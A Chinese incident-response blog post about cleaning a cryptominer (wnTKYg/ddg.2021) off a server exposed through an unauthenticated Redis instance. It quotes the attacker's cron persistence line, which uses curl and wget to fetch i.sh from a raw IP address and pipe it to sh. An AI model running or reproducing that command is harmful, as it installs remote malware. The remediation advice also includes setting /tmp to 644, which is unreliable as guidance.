locate wnTKYg命令一上屏,遂将这个程序位置暴露出来,竟然在/tmp下。百度查了查据说这个是redis允许远程连接并且没设密码的关系,正好符合我们新项目测试的环境,赶紧打开/etc/redis.conf文件 把bind 127.0.0.1的注释del掉了,重启redis。测试从外部机器上登录redis已经登不上了。
接下来改着手干掉这个进程了,二话不说直接kill -9掉这个进程,cd到/tmp下 把这个文件打个包,传到本地电脑上,有时间研究研究。tar打包并传输完成再次top的时候发现这个进程又复活了,首先想到的是crond里面有计划任务,打开crontab -e查看没什么异常。
处理方法和建议:
- 1.根据这个提示,发现/tmp下还有个ddg.2021文件,这个文件在进程里面也确实存在,直接kill -9 ddg.2021进程和wnTKYg进程的pid。
- 2.然后删除/tmp下的ddg.2021和wnTKYg文件,发现还有个imWBR1文件也一并删除了。/tmp下的带执行权限的文件总会引起怀疑。
- 3.把/tmp文件夹的执行权限去掉,改成644。
4,ls /var/spool/进去cron里面看了一下,有个叫root的脚本,内容如下:
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh */5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
直接删除这cron文件夹,OK了
- 5.更改redis只能本地登录,设置redis认证密码。
- 6.关闭挖矿服务器访问:
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
再次ps aux |grep wnTKYg 和 ps aux |grep |ddg.2021的时候没有发现这俩进程。
保险起见ps aux |grep imWBR1 这个是刚刚删除的tmp文件夹下有执行权限的文件,也并没有该进程,仔细检查top之后,发现恢复正常。
总结:
这种挂马钻的空子总是新项目测试项目的redis没有安全防护,用的默认配置,免密远程登录。大家多多注意安全,做好防护。安全生产最重要!
1942
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
